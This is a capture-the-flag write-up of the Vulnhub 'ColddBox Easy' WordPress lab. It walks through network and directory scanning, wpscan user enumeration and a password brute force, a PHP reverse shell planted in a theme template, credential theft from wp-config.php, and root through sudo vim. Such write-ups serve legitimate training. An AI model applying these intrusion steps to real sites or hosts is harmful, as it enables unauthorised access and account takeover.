Writeups
  • Writeups
    • TryHackMe
      • πŸ•΅οΈβ€β™€οΈBasic Pentesting
      • πŸ”·Blue
      • ⚑Bolt
      • πŸ€–Cyborg
      • πŸƒHA Jocker CTF
      • 🧊Ice
      • πŸ•―οΈIgnite
      • πŸŽƒJack-of-All-Trades
      • 🎩Mr Robot
      • πŸ”“Overpass
      • πŸ₯’Pickle Rick
      • πŸ’»RootMe
      • πŸ‡Year of the Rabbit
    • Vulnhub
      • πŸ“¦Colddbox
      • πŸ’±Crypto Bank
      • πŸ›°οΈGoldenEye
      • 🎊Hacker Fest
      • 🀠Lampiao
      • ✴️Node
      • β™ŸοΈPWNLAB
      • πŸ”“Solid State
      • πŸ“ŽStapler
    • CTFs
      • 🀐Zippy
    • Demos
      • πŸ€’AMSI bypass using Python
      • πŸŒ†Steganography tools
Powered by GitBook
On this page
  • 1. Reconnaissance
  • 2. Scanning
  • 2.1 Nmap
  • 2.2 Directory Enumeration
  • 3. Initial Foothold
  • 3.1 WPScan
  • 4. Privilege Escalation
  • 4.1 wp-config.php
  • 4.2 Escalation
  1. Writeups
  2. Vulnhub

Colddbox

ColddBox Easy is a Wordpress machine with an easy level of difficulty, highly recommended for beginners in the field.

1. Reconnaissance

  • Scanning the network to find vulnerable machine's IP

nmap -sn 192.168.10.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 10:06 IST
Nmap scan report for 192.168.10.1
Host is up (0.0032s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 192.168.10.2
Host is up (0.0032s latency).
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)
Nmap scan report for 192.168.10.3
Host is up (0.0018s latency).
MAC Address: 08:00:27:1C:76:C3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.12
Host is up (0.0014s latency).
MAC Address: 08:00:27:1F:03:A5 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.11
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.07 seconds

  • We find the IP of the vulnerable machine to be 192.168.10.12

2. Scanning

2.1 Nmap

  • Using nmap to find the open ports and their services

nmap -p- -sV 192.168.10.12
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 10:08 IST
Nmap scan report for 192.168.10.12
Host is up (0.37s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:1F:03:A5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.21 seconds

  • We find 2 open ports, tcp ports 80 and 4512 with a web server and ssh running respectively

2.2 Directory Enumeration

  • Brute forcing directories using gobuster to find any hidden directories

gobuster dir -w /usr/share/wordlists/dirb/common.txt --url http://192.168.10.12
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.12
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/17 10:15:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/hidden               (Status: 301) [Size: 315] [--> http://192.168.10.12/hidden/]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.10.12/]         
/server-status        (Status: 403) [Size: 278]                                   
/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.10.12/wp-admin/]
/wp-content           (Status: 301) [Size: 319] [--> http://192.168.10.12/wp-content/]
/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.10.12/wp-includes/]
/xmlrpc.php           (Status: 200) [Size: 42]                                         
                                                                                       
===============================================================
2022/03/17 10:15:27 Finished
===============================================================

  • We find the directory wp-admin and enumerating further through wappalyzer we can conclude that it is a WordPress site.

3. Initial Foothold

3.1 WPScan

  1. To enumerate the users we use -eu

wpscan -eu --url http://192.168.10.12
_______________________________________________________________

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 
---------------------------------------------------------------------------------

[+] Finished: Thu Mar 17 18:24:39 2022
[+] Requests Done: 16
[+] Cached Requests: 48
[+] Data Sent: 4.363 KB
[+] Data Received: 18.32 KB
[+] Memory used: 179.02 MB
[+] Elapsed time: 00:00:02

  • We get 4 potential usernames:

    • the cold in person

    • c0ldd

    • hugo

    • philip

  1. Brute-forcing password using a word list with -P

wpscan -P /usr/share/wordlists/rockyou.txt --url http://192.168.10.12
_______________________________________________________________

[!] Valid Combinations Found:
 | Username: c0ldd, Password: 9876543210

[!] No WPScan API Token given, as a result vulnerability data has not been output..02%  ETA: ??:??:??
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 17 18:31:57 2022
[+] Requests Done: 12140
[+] Cached Requests: 18
[+] Data Sent: 5.035 MB
[+] Data Received: 43.984 MB
[+] Memory used: 298.348 MB
[+] Elapsed time: 00:02:55

We get c0ldd : 9876543210

  1. Using these credentials, we can login to the wp-admin page and upload a php reverse shell to Appearance>Editor>template header where url is http://192.168.10.12/wp-admin/theme-editor.php?file=header.php&theme=twentyfifteen

    • Using the reverse shell /usr/share/webshells/php/php-reverse-shell.php ,appending it to the header file template and updating it to use port 9001

    • Starting nc -lvnp 9001

    • Navigating to the headers tab under appearance to trigger the reverse shell.

4. Privilege Escalation

4.1 wp-config.php

  • Stabilizing the shell using python3 -c 'import pty;pty.spawn("/bin/bash")'

  • We are the user www-data

  • Enumerating the current directory we find a wp-config.php file in /var/www/html

cat wp-config.php
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You dont have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');

/** MySQL database username */
define('DB_USER', 'c0ldd');

/** MySQL database password */
define('DB_PASSWORD', 'cybersecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

---------------------------------------------------------------------------------

We find the database to be MySQL with cOldd : cybersecurity as login credentials

4.2 Escalation

  1. c0ldd

  • Using the credentials to login as user c0ldd

su c0ld
Password: cybersecurity

c0ldd@ColddBox-Easy:~$ ls
user.txt

  • User.txt

c0ldd@ColddBox-Easy:~$ cat user.txt
RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==

echo 'RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==' | base64 -d
Felicidades, primer nivel conseguido!

  1. Root

  • using sudo -l, we find c0ldd can run these processes as root:

c0ldd@ColddBox-Easy:~$ sudo -l
[sudo] password for c0ldd: cyberesecurity

Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp

  • Use SUDO privilege escalation on vim from GTFObins : vim -c ':!/bin/sh'

c0ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'

:!/bin/sh
whoami
root
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ColddBox-Easy:~

  • root.txt

root@ColddBox-Easy: cd /root
root@ColddBox-Easy:/root ls
root.txt
root@ColddBox-Easy:/root cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
echo 'wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=' | base64 -d
Β‘Felicidades, mΓ‘quina completada!
PreviousVulnhubNextCrypto Bank

Last updated 2 years ago

πŸ“¦